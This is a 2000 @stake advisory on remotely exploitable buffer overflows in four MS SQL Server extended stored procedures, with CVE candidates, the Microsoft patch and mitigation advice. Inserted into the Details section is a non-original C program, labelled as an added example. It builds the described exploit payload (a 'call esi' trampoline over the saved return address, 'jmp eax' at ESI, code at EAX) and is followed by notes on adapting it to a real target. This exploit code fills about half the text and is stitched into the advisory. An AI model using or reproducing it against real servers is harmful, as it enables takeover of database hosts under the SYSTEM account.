Atstake Security Advisory 00-12-01.1

Posted Dec 3, 2000
Authored by Atstake | Site atstake.com

Atstake Security Advisory A120100-1 - Microsoft's database server, SQL Server, contains several buffer overrun vulnerabilities that can be remotely exploited to execute arbitrary code on the affected system, allowing an attacker to gain complete control of the server. In situations where the SQL Server is protected by a firewall, it may still be possible to launch this attack through a connecting web server, depending on how secure the web server's application is. Proof of concept source is linked in the advisory below.
SHA-256 | 7a62c36595e25982e5eb61be78940b169d48a8771ddd9252d29796af5fbdf890

@stake Inc.
www.atstake.com

Security Advisory

Advisory Name: Microsoft SQL Server Extended Stored Procedure
Vulnerability
Release Date: 12/01/2000
Application: MS SQL Server 7.0 - all service packs
MS SQL Server 2000
Platform: Windows NT 4.0 / 2000
Severity: There are several buffer overflow conditions
that could result in execution of arbitrary
code or a denial of service.
Authors: David Litchfield [dlitchfield@atstake.com]
Vendor Status: Vendor has patch, see below
Web: www.atstake.com/research/advisories/2000/a120100-1.txt


Overview:

Microsoft's database server, known as SQL Server, contains several
buffer overrun vulnerabilities that can be remotely exploited to execute
arbitrary code on the affected system, allowing an attacker to gain
complete control of the server. In situations where the SQL Server is
protected by a firewall, it may still be possible to launch this attack
through a connecting web server, though this depends on how secure the
web server's application is.


Details:

To add further functionality to SQL Server there are extended stored
procedures, each performing one task or another. When an overly long
string parameter is supplied to several of these procedures, a buffer is
overrun. Ironically, it appears that these overruns occur in part of the
exception handling code called by SQL Server to protect itself. The
procedures known to be vulnerable are xp_displayparamstmt,
xp_enumresultset, xp_showcolv and xp_updatecolvbm. Each of these extended
stored procedures is exported by xprepl.dll and may be executed by PUBLIC,
that is, by everyone who can log in to the database server, even
low-privileged logins. If the overruns are exploited, the injected code
runs in the context of the powerful SYSTEM account.

Once the overflow occurs, the EAX register points to the user-supplied
data, so to make the processor execute code placed in this buffer the
saved return address needs to be overwritten with the address of a
'jmp eax' or 'call eax' instruction. Examining the DLLs loaded into the
process's address space shows that the DLL containing the vulnerability,
xprepl.dll, does not change across SQL service packs, at least for SQL
Server 7. If such an instruction could be found in this DLL's address
space, then proof of concept code would work across all SQL service packs.
As it happens, these instructions do not exist in this DLL. However, a
'call esi' instruction does exist, and on overrun the ESI register points
4 bytes above where the saved return address is overwritten. By
overwriting the saved return address with the address of the 'call esi'
instruction, and by setting the bytes at ESI to FF E0 ('jmp eax'), the
'call esi' executes, the 'jmp eax' executes in turn, and control has
"stepped over" the DWORD that overwrote the saved return address.
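The trampoline layout described above, written out as an added example. This is not @stake's sqladv-poc.c and contains no real offsets: the offset of the saved return address inside the parameter (RET_OFF), the module image and load address scanned for the 'call esi', and the int3 byte standing in for the code EAX points at are all constructed assumptions. The NUL check at the end is an added caveat, not from the advisory: the vulnerable parameter is a string, so a trampoline address containing a zero byte would truncate the payload before the overwrite lands.

```c
/*
 * Added example, not @stake's sqladv-poc.c: builds the overflow payload the
 * advisory describes (saved EIP -> 'call esi', FF E0 'jmp eax' at ESI, code
 * at EAX).  Assumptions, not facts from the advisory: RET_OFF, the sample
 * image and its load address, and the stand-in code bytes.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86 opcode bytes named in the advisory */
static const uint8_t OP_CALL_ESI[] = { 0xFF, 0xD6 };
static const uint8_t OP_JMP_EAX[]  = { 0xFF, 0xE0 };
static const uint8_t OP_CALL_EAX[] = { 0xFF, 0xD0 };

/* Search a module image for an instruction byte pattern.
 * Returns the offset of the first match, or -1 if absent. */
long find_pattern(const uint8_t *img, size_t len,
                  const uint8_t *pat, size_t plen)
{
    if (plen == 0 || len < plen)
        return -1;
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(img + i, pat, plen) == 0)
            return (long)i;
    return -1;
}

/* The advisory's first choice: does the image hold 'jmp eax' or 'call eax'? */
int has_direct_jump(const uint8_t *img, size_t len)
{
    return find_pattern(img, len, OP_JMP_EAX, sizeof OP_JMP_EAX) >= 0 ||
           find_pattern(img, len, OP_CALL_EAX, sizeof OP_CALL_EAX) >= 0;
}

/* The fallback the advisory settles on: the first 'call esi' in the image.
 * Returns its virtual address, or 0 if the image has none. */
uint32_t locate_trampoline(const uint8_t *img, size_t len, uint32_t base)
{
    long off = find_pattern(img, len, OP_CALL_ESI, sizeof OP_CALL_ESI);
    return off < 0 ? 0 : base + (uint32_t)off;
}

/* Lay out the overlong parameter (low address -> high address):
 *   [ code, EAX points here ][ NOP sled ][ saved EIP := &'call esi' ]
 *   [ FF E0 'jmp eax', ESI points here, 4 bytes above saved EIP ][ pad ]
 * Returns the payload length, or 0 if out is too small or code too long. */
size_t build_payload(uint8_t *out, size_t out_len, size_t ret_off,
                     uint32_t call_esi, const uint8_t *code, size_t code_len)
{
    size_t total = ret_off + 4 + sizeof OP_JMP_EAX + 2;
    if (out_len < total || code_len > ret_off)
        return 0;
    memset(out, 0x90, total);                  /* NOPs fill the gaps */
    memcpy(out, code, code_len);
    out[ret_off + 0] = (uint8_t)(call_esi);    /* little-endian DWORD */
    out[ret_off + 1] = (uint8_t)(call_esi >> 8);
    out[ret_off + 2] = (uint8_t)(call_esi >> 16);
    out[ret_off + 3] = (uint8_t)(call_esi >> 24);
    memcpy(out + ret_off + 4, OP_JMP_EAX, sizeof OP_JMP_EAX);
    return total;
}

/* Added caveat: a string parameter ends at the first NUL, so every byte,
 * the trampoline address included, must be non-zero.  Returns 1 if so. */
int payload_is_nul_free(const uint8_t *p, size_t n)
{
    return memchr(p, 0, n) == NULL;
}

/* Constructed sample image: stands in for a DLL that contains a 'call esi'
 * but neither 'jmp eax' nor 'call eax', as reported for xprepl.dll. */
static const uint8_t SAMPLE_IMAGE[] = {
    0x55, 0x8B, 0xEC, 0x8B, 0x75, 0x08, 0xFF, 0xD6, 0x5D, 0xC3
};
#define SAMPLE_BASE 0x41424340u   /* hypothetical, NUL-free load address */
#define RET_OFF     16            /* hypothetical offset of the saved EIP */
static const uint8_t SAMPLE_CODE[] = { 0xCC };   /* int3 stands in for code */

static uint8_t g_payload[64];

/* Runs the whole scenario into g_payload; returns the length, 0 on failure. */
size_t demo_build(void)
{
    uint32_t tramp = locate_trampoline(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE,
                                       SAMPLE_BASE);
    if (tramp == 0 || has_direct_jump(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE))
        return 0;   /* with a direct jump available you would not need ESI */
    return build_payload(g_payload, sizeof g_payload, RET_OFF, tramp,
                         SAMPLE_CODE, sizeof SAMPLE_CODE);
}

int main(void)
{
    size_t n = demo_build();
    printf("payload %zu bytes, saved EIP -> 0x%02X%02X%02X%02X, nul-free=%d\n",
           n, g_payload[RET_OFF + 3], g_payload[RET_OFF + 2],
           g_payload[RET_OFF + 1], g_payload[RET_OFF],
           payload_is_nul_free(g_payload, n));
    return n ? 0 : 1;
}
```

On a real target the image bytes come from the loaded xprepl.dll and the base from its load address; the layout function is unchanged, and the NUL check is the one worth running before sending anything, since a module loaded at an address with a zero byte rules out this trampoline through a string parameter.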


Proof of Concept:

Source code available at:
http://www.atstake.com/research/advisories/2000/sqladv-poc.c

Vendor Response:

Microsoft has released a bulletin describing this issue:
http://www.microsoft.com/technet/security/bulletin/ms00-092.asp

Microsoft has released a patch to fix this problem:
http://support.microsoft.com/support/sql/xp_security.asp


Recommendation:

Disallow PUBLIC execute access to these extended stored procedures unless
you need it.

Install the vendor supplied patch.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

xp_displayparamstmt - CAN-2000-1081
xp_enumresultset - CAN-2000-1082
xp_showcolv - CAN-2000-1083
xp_updatecolvbm - CAN-2000-1084


Advisory Release policy: http://www.atstake.com/research/policy/
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved
